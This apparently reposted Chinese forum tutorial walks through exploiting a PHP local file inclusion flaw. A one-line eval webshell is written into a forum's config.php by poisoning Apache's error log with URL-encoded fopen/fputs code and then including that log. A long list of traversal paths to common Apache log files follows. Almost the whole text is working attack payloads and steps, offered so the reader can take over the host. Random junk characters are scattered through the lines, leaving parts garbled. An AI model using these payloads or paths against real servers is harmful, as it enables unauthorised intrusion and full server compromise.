因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 / c J* V4 w! z
' d* K! } Q% P, S1 ]. D
比如还是这句一句话木马
: \4 X; O; Q2 P5 S* W3 ~' s3 r<?eval($_POST[cmd]);?>
- ]1 L# K' o" ~% \
" j8 }. u0 O% J, j% a! S到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,
5 |5 \, a4 @/ H* }/ v: d* Afopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 & j: V3 Z* n' G( z" z2 a
! {/ F$ {* h. `: h$ q- X6 B<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
" z" i" R( X# m# |: z4 Ifclose($fp);?> //在config.php里写入一句木马语句 ; n, e" O' \; w% {8 v
5 v* `9 r0 e$ h) _5 ]5 g1 u& Q* a
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。 ; V( k8 n/ P; B8 s
转换为
, R& G+ i( ^; j+ k! o" K6 ^%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
4 d+ A9 w: |8 R8 b" ]3 ?config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp * @8 {* E! A0 K: r1 M# _4 {* @/ {* i
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B % f M: \" [/ `. u/ l5 T9 A, b7 L1 g) ]
fclose%28%24fp%29%3B%3F%3E : f( T/ d4 Z9 J7 w6 U4 z
我们提交
4 a3 z2 g( w) h O9 shttp://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww L# P1 {5 H7 y/ M
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
" n8 @" {' K- {3 W%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
5 M2 V: B& ~# ecmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
1 w z& P2 r3 k- ?% Q* \$ H
2 H+ _0 ~1 w8 i7 @ {2 F这样就错误日志里就记录下了这行写入webshell的代码。
% r$ d6 t' h( ?+ @- }( l我们再来包含日志,提交 # q; T0 C/ e( q8 Y% _
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log / T2 O: O4 x- U* y" y# z" J. O; U
( S$ W7 [ A/ q+ a) A+ t( _; n# r% t这样webshell就写入成功了,config.php里就写入一句木马语句 4 w# F$ |; K7 T1 D; \
OK.
3 a8 `9 s4 c2 K4 |- \) k% y* Fhttp://www.xxx.com/forum/config.php这个就成了我们的webshell & _9 I; T: W P% ^& y0 i, J$ ^
直接用lanker的客户端一连,主机就是你的了。 ! M& D7 a( F' c# J7 W
+ |3 k! w2 f- l) j- _
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 7 O2 j4 \% w6 M. w0 J9 [
8 A( V: l4 R1 t+ |- `1 I7 @其他的日志路径,你可以去猜,也可以参照这里。
5 |% J) A3 {) k2 J/ R0 W. ^" L../../../../../../../../../../var/log/httpd/access_log
l& q3 n! L) A2 J# s# i9 [../../../../../../../../../../var/log/httpd/error_log 8 v5 f$ g$ c% m
../apache/logs/error.log 4 D0 Q9 \: U! n/ S6 b2 ~
../apache/logs/access.log 2 b# |% c7 J8 B! a: _' B
../../apache/logs/error.log
e8 ~/ o8 E1 x, A5 H. k, \../../apache/logs/access.log ; S. J4 a7 h1 ^. R6 b
../../../apache/logs/error.log
! t4 ?) E+ K9 X../../../apache/logs/access.log
$ r1 \5 }8 M4 C( L- ^) `9 f, ~; m../../../../../../../../../../etc/httpd/logs/acces_log 7 ^; R4 m( O. i' d3 s" ~( ]# p! A
../../../../../../../../../../etc/httpd/logs/acces.log " ~! H% f( o5 I5 m# d& u0 q- S% H6 ^
../../../../../../../../../../etc/httpd/logs/error_log
5 Z1 x4 m( f8 l) _+ y../../../../../../../../../../etc/httpd/logs/error.log
E' j. ?3 x# C* K0 o+ A../../../../../../../../../../var/www/logs/access_log S4 ^, F# }4 N
../../../../../../../../../../var/www/logs/access.log ( }; A4 i2 `7 x9 g' S# W
../../../../../../../../../../usr/local/apache/logs/access_log 2 Z* Z3 Z7 y6 Y
../../../../../../../../../../usr/local/apache/logs/access.log
3 T/ u9 G5 o, o$ M5 f../../../../../../../../../../var/log/apache/access_log
5 E5 w- o# K- P) M../../../../../../../../../../var/log/apache/access.log
3 T- A6 I& `! }/ y# M" P2 h2 T../../../../../../../../../../var/log/access_log 1 I. ?! b+ T. @) Z1 E5 P5 ^# z
../../../../../../../../../../var/www/logs/error_log 0 x6 ]7 u7 a/ y) Z$ s
../../../../../../../../../../var/www/logs/error.log $ \$ U9 v( ]; u) D4 i
../../../../../../../../../../usr/local/apache/logs/error_log 1 J% b" Q$ t. U Z( |7 [2 J
../../../../../../../../../../usr/local/apache/logs/error.log % E, d6 q3 i: R* A* ^
../../../../../../../../../../var/log/apache/error_log # S, S1 S f5 Z$ O! X# i! a' @
../../../../../../../../../../var/log/apache/error.log
" t! C& D6 W0 Y9 ^5 f# w4 W../../../../../../../../../../var/log/access_log
0 @3 z- P0 _( ]5 d../../../../../../../../../../var/log/error_log ! R; v' J$ t _8 U
/var/log/httpd/access_log 8 v9 ^( P% V8 x+ W, p* r/ ]+ X
/var/log/httpd/error_log 6 q% {4 u2 y+ i4 i4 [- \& {
../apache/logs/error.log
, U: d; X7 L5 Q# T7 H$ Q8 _../apache/logs/access.log
$ W0 @+ e3 u) H../../apache/logs/error.log + c( O( | R6 K- a5 V8 t+ G
../../apache/logs/access.log
- ^6 i2 W* T# O$ N+ f8 G../../../apache/logs/error.log ' A. y5 y' W- k1 ?) ~0 ?# a' @( e
../../../apache/logs/access.log
. Q f. F# p' ^( R& u+ O- f, E/etc/httpd/logs/acces_log
8 T6 ~7 j ?' L1 I/etc/httpd/logs/acces.log / r4 d1 N0 n4 Q) Z8 T2 v
/etc/httpd/logs/error_log 6 l. I9 R0 Y/ @- H" O
/etc/httpd/logs/error.log $ s" H5 [ y( Q6 A4 H
/var/www/logs/access_log 5 \4 ~( T1 |4 S w( E+ X. j+ ?
/var/www/logs/access.log ' P0 P' P6 y, C2 j- C6 D9 U
/usr/local/apache/logs/access_log x4 g5 N% c: q5 b
/usr/local/apache/logs/access.log 3 g- |; E) P+ |- F7 a
/var/log/apache/access_log % j/ B8 T2 r& J- f, @- k
/var/log/apache/access.log 1 b$ U0 o: \9 ~$ P: E8 C- ~
/var/log/access_log
# L' s. s; X# L% G/var/www/logs/error_log
" q) r' s3 Q* O# Z/var/www/logs/error.log
% n2 k% e3 F5 f+ M3 @8 Q7 {/usr/local/apache/logs/error_log
5 h6 _/ k X1 o; q/usr/local/apache/logs/error.log 5 w( ^" ]6 k) e: h/ H' w
/var/log/apache/error_log
# V) Y# A- X. a. I3 P/var/log/apache/error.log
' {$ D; L5 b7 j$ a2 }6 F/var/log/access_log ) e# z& Y+ p/ q7 m: A
/var/log/error_log |